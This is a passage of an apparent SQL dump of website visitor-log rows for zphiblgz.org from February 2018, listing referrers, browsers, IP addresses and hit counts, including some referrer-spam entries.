','173.252.100.202','000',1,0),(20496,'2018-02-09','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','78.156.125.81','000',1,0),(20497,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.6','000',1,0),(20498,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(20499,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',2,0),(20500,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',1,0),(20501,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.7','000',1,0),(20502,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.231','000',2,0),(20503,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.178','000',1,0),(20504,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.135','000',1,0),(20505,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.15','000',1,0),(20506,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.150','000',1,0),(20507,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',1,0),(20508,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.173','000',1,0),(20509,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',2,0),(20510,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.145','000',2,0),(20511,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.151','000',1,0),(20512,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.2','000',1,0),(20513,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.203','000',2,0),(20514,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.224','000',3,0),(20515,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.59','000',2,0),(20516,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',1,0),(20517,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(20518,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',1,0),(20519,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.209','000',2,0),(20520,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.244','000',2,0),(20521,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.90.120','000',3,0),(20522,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.107','000',1,0),(20523,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(20524,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',1,0),(20525,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',2,0),(20526,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(20527,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.108','000',1,0),(20528,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',1,0),(20529,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',1,0),(20530,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.41','000',1,0),(20531,'2018-02-09','https://zphiblgz.org','python-requests','Unknown','2.18.4','','209.150.108.10','000',1,0),(20532,'2018-02-09','https://zphiblgz.org','Chrome','iPhone','64.0.3282.112','','71.114.37.67','000',1,0),(20533,'2018-02-09','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.9','000',1,0),(20534,'2018-02-09','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.230','000',2,0),(20535,'2018-02-09','https://zphiblgz.org','Firefox','Macintosh','58.0','','100.36.75.210','000',2,0),(20536,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.118','000',2,0),(20537,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.37','000',1,0),(20538,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.213','000',1,0),(20539,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.199','000',1,0),(20540,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',1,0),(20541,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',1,0),(20542,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.217','000',3,0),(20543,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',2,0),(20544,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.144','000',1,0),(20545,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.214','000',2,0),(20546,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.151','000',1,0),(20547,'2018-02-09','https://www.google.com/','Chrome','Windows','64.0.3282.140','','73.20.211.146','000',3,0),(20548,'2018-02-09','https://zphiblgz.org','MSIE','Windows','9.0','','74.217.90.250','000',1,0),(20549,'2018-02-09','https://zphiblgz.org','MSIE','Windows','11.0','','74.217.90.250','000',1,0),(20550,'2018-02-09','https://zphiblgz.org','MSIE','Windows','8.0','','74.217.90.250','000',1,0),(20551,'2018-02-09','https://zphiblgz.org/event/5th-annual-denim-pearlz-party/','AppleWebKit','Windows','534','','131.253.25.252','000',1,0),(20552,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.169','000',1,0),(20553,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.219','000',1,0),(20554,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.139','000',2,0),(20555,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',1,0),(20556,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.116','000',1,0),(20557,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.221','000',1,0),(20558,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.180','000',2,0),(20559,'2018-02-09','https://zphiblgz.org','MSIE','Windows','8.0','','50.112.194.65','000',1,0),(20560,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.208','000',3,0),(20561,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.71','000',1,0),(20562,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',1,0),(20563,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.30','000',3,0),(20564,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',2,0),(20565,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',1,0),(20566,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.115','000',1,0),(20567,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',2,0),(20568,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.70','000',2,0),(20569,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.204','000',1,0),(20570,'2018-02-09','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.26','000',1,0),(20571,'2018-02-09','https://zphiblgz.org','Firefox','Windows','40.1','','118.101.245.254','000',2,0),(20572,'2018-02-10','https://zphiblgz.org','Edge','Windows','16.16299','','73.12.8.92','000',4,0),(20573,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',2,0),(20574,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',4,0),(20575,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.187','000',2,0),(20576,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',2,0),(20577,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',5,0),(20578,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',3,0),(20579,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',5,0),(20580,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.202','000',2,0),(20581,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.71','000',1,0),(20582,'2018-02-10','https://www.google.com/','Chrome','Windows','63.0.3239.132','','104.178.10.179','000',2,0),(20583,'2018-02-10','https://zphiblgz.org','Firefox','Windows','19.0','','185.206.224.108','000',1,0),(20584,'2018-02-10','https://pills24h.com/buy-doxazosin-online-without-prescription/','Opera','Windows','9.0','','37.115.184.155','000',2,0),(20585,'2018-02-10','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','159.100.248.17','000',2,0),(20586,'2018-02-10','https://zphiblgz.org','Firefox','Windows','40.1','','88.230.79.72','000',2,0),(20587,'2018-02-10','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','69.90.161.235','000',2,0),(20588,'2018-02-10','https://zphiblgz.org','Safari','iPhone','9.0','','112.193.170.95','000',1,0),(20589,'2018-02-10','https://zphiblgz.org','Safari','iPhone','9.0','','1.202.82.192','000',1,0),(20590,'2018-02-10','http://mysexpics.ru/','Opera','Windows','9.00','','188.163.79.63','000',1,0),(20591,'2018-02-10','https://zphiblgz.org','Chrome','Windows','50.0.2661.75','','159.65.64.189','000',1,0),(20592,'2018-02-10','https://tam-gde-more.ru/','Opera','Windows','7.0','','188.163.79.63','000',2,0),(20593,'2018-02-10','https://nakozhe.com/','Opera','Windows','8.01','','188.163.79.63','000',5,0),(20594,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','95.211.94.107','000',1,0),(20595,'2018-02-10','https://zphiblgz.org','MSIE','Windows','11.0','','180.183.198.185','000',1,0),(20596,'2018-02-10','https://zphiblgz.org','Firefox','Windows','35.0','','179.125.127.90','000',1,0),(20597,'2018-02-10','https://zphiblgz.org','Safari','Windows','4.0','','99.194.18.1','000',1,0),(20598,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',2,0),(20599,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.214','000',2,0),(20600,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.228','000',2,0),(20601,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.116','000',6,0),(20602,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',1,0),(20603,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.206','000',1,0),(20604,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',1,0),(20605,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',1,0),(20606,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.57','000',5,0),(20607,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',1,0),(20608,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',1,0),(20609,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.219','000',4,0),(20610,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.70','000',2,0),(20611,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',3,0),(20612,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.13','000',2,0),(20613,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.10','000',1,0),(20614,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',3,0),(20615,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.71','000',2,0),(20616,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.183','000',2,0),(20617,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.112','000',2,0),(20618,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.210','000',3,0),(20619,'2018-02-10','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(20620,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.17','000',1,0),(20621,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.169','000',2,0),(20622,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',2,0),(20623,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',4,0),(20624,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(20625,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.198','000',1,0),(20626,'2018-02-10','http://polyana-skazok.org.ua/','MSIE','Windows','6.0','','46.211.13.134','000',3,0),(20627,'2018-02-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.11','000',1,0),(20628,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.200','000',1,0),(20629,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.194','000',2,0),(20630,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.108','000',1,0),(20631,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',4,0),(20632,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',1,0),(20633,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.232','000',1,0),(20634,'2018-02-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1693.I02lyg8c-_kgQmAQgO471yOf4tGCX6-hGFEOfmEt0bIKprMIVGlQxScS-YzNtvGW.7a730817b7b6e9dbd98de0df2248777ce83262f6&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWRZV3NFNHRmNnExb3UyMXhSdTBLVXZiU2tYRDJ5S043VEhvVXVYdUVRa29Md0Q0LUVYYkNIc2o2ck9KSWhkRW03Wld0Mkk5QjZDbnFmQVFGdWhmdW8&b64e=2&sign=3f3d2c8773b6e80afc1ddaafc3c28511&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrYuzAud_Lm7Rwbz5hJkn0B0zDfcrwhR2QKos4JMvtC4RnLj6z8pWBStO9B0dSk2FvBcqKQhGv9t0McDvX1JReBqRZQ-Pvw9CPFYyY4hhtSWE9npRPMX209JsroRWT_yJ1&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVkyE50ZSfmQhL08IkdDhPwWjDKL6oXoq-dbboK5StvgRgHk8r6qGiDAzHC0lIxOrrShhluvQiZSQ&l10n=ru&cts=1518277407876&mc=6.15864733278','MSIE','Windows','10.0','','93.80.147.101','000',1,0),(20635,'2018-02-10','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1693.I02lyg8c-_kgQmAQgO471yOf4tGCX6-hGFEOfmEt0bIKprMIVGlQxScS-YzNtvGW.7a730817b7b6e9dbd98de0df2248777ce83262f6&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YOm24rr5dkiDnIjpu2TfUVc&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWRZV3NFNHRmNnExb3UyMXhSdTBLVXZiU2tYRDJ5S043VEhvVXVYdUVRa29Md0Q0LUVYYkNIc2o2ck9KSWhkRW03Wld0Mkk5QjZDbnFmQVFGdWhmdW8&b64e=2&sign=3f3d2c8773b6e80afc1ddaafc3c28511&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrYuzAud_Lm7Rwbz5hJkn0B0zDfcrwhR2QKos4JMvtC4RnLj6z8pWBStO9B0dSk2FvBcqKQhGv9t0McDvX1JReBqRZQ-Pvw9CPFYyY4hhtSWE9npRPMX209JsroRWT_yJ1&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVkyE50ZSfmQhL08IkdDhPwWjDKL6oXoq-dbboK5StvgRgHk8r6qGiDAzHC0lIxOrrShhluvQiZSQ&l10n=ru&cts=1518277407876&mc=6.15864733278','MSIE','Windows','10.0','','5.166.235.60','000',1,0),(20636,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',4,0),(20637,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.185','000',1,0),(20638,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.218','000',1,0),(20639,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.140','000',1,0),(20640,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',2,0),(20641,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.196','000',2,0),(20642,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.12','000',2,0),(20643,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',1,0),(20644,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(20645,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',2,0),(20646,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.102','000',4,0),(20647,'2018-02-10','https://www.google.com/','Chrome','Windows','63.0.3239.132','','71.255.197.63','000',4,0),(20648,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.16','000',4,0),(20649,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.184','000',1,0),(20650,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.119','000',2,0),(20651,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',1,0),(20652,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.205','000',1,0),(20653,'2018-02-10','http://chatroulette.life/','MSIE','Windows','6.0','','46.119.115.60','000',3,0),(20654,'2018-02-10','https://zphiblgz.org','Firefox','Windows','40.1','','201.86.64.121','000',2,0),(20655,'2018-02-10','http://drugs-no-rx.info/','Opera','Windows','8.01','','46.119.115.60','000',2,0),(20656,'2018-02-10','https://zphiblgz.org','Safari','iPhone','11.0','','174.205.2.194','000',5,0),(20657,'2018-02-10','https://zphiblgz.org','Safari','Macintosh','8.0','','54.85.182.120','000',7,0),(20658,'2018-02-10','https://zphiblgz.org','Safari','iPhone','11.0','','66.87.116.52','000',3,0),(20659,'2018-02-10','https://zphiblgz.org','Safari','iPhone','11.0','','99.203.17.70','000',6,0),(20660,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.28','000',1,0),(20661,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.209','000',3,0),(20662,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.16','000',2,0),(20663,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.145','000',2,0),(20664,'2018-02-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.13','000',1,0),(20665,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.59','000',2,0),(20666,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.129','000',1,0),(20667,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',2,0),(20668,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.160','000',4,0),(20669,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.22','000',1,0),(20670,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.17','000',3,0),(20671,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.202','000',2,0),(20672,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.200','000',1,0),(20673,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.178','000',2,0),(20674,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.204','000',2,0),(20675,'2018-02-10','https://zphiblgz.org/','Chrome','Windows','57.0.2987.133','','77.120.125.23','000',2,0),(20676,'2018-02-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.17','000',1,0),(20677,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.84','000',2,0),(20678,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',3,0),(20679,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.236','000',2,0),(20680,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.212','000',2,0),(20681,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.21','000',1,0),(20682,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.88','000',1,0),(20683,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.20','000',2,0),(20684,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.207','000',1,0),(20685,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.113','000',1,0),(20686,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.208','000',3,0),(20687,'2018-02-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.6','000',1,0),(20688,'2018-02-10','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','23.238.16.86','000',2,0),(20689,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.150','000',2,0),(20690,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.210','000',1,0),(20691,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.219','000',1,0),(20692,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.130','000',1,0),(20693,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',1,0),(20694,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.148','000',1,0),(20695,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',1,0),(20696,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.53','000',2,0),(20697,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.214','000',1,0),(20698,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.79.118','000',2,0),(20699,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.30','000',1,0),(20700,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.21','000',1,0),(20701,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.103','000',1,0),(20702,'2018-02-10','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','79.98.129.61','000',2,0),(20703,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.203','000',2,0),(20704,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.58','000',2,0),(20705,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.88','000',2,0),(20706,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.198','000',1,0),(20707,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.76','000',2,0),(20708,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',1,0),(20709,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.215','000',1,0),(20710,'2018-02-10','https://zphiblgz.org','MSIE','Windows','11.0','','37.48.68.229','000',1,0),(20711,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',2,0),(20712,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',3,0),(20713,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',4,0),(20714,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',1,0),(20715,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.145','000',1,0),(20716,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.57','000',5,0),(20717,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.165','000',1,0),(20718,'2018-02-10','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.171','000',5,0),(20719,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.212','000',2,0),(20720,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.221','000',1,0),(20721,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.196','000',1,0),(20722,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.211','000',1,0),(20723,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.79','000',2,0),(20724,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.26','000',2,0),(20725,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.213','000',2,0),(20726,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.90','000',1,0),(20727,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.204','000',2,0),(20728,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',1,0),(20729,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.122','000',1,0),(20730,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.198','000',3,0),(20731,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.78','000',2,0),(20732,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.22','000',1,0),(20733,'2018-02-10','https://www.google.com/','Chrome','Windows','63.0.3239.132','','73.129.22.251','000',2,0),(20734,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.46','000',1,0),(20735,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.228.116','000',1,0),(20736,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.164','000',1,0),(20737,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.159','000',1,0),(20738,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.149','000',1,0),(20739,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.34','000',1,0),(20740,'2018-02-10','https://zphiblgz.org/','Firefox','Windows','45.68.21','','77.72.83.71','000',1,0),(20741,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',1,0),(20742,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',3,0),(20743,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',4,0),(20744,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.112','000',1,0),(20745,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.166','000',1,0),(20746,'2018-02-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.5','000',1,0),(20747,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.113','000',3,0),(20748,'2018-02-10','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.15','000',1,0),(20749,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.246','000',2,0),(20750,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.18','000',2,0),(20751,'2018-02-10','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.182','000',1,0),(20752,'2018-02-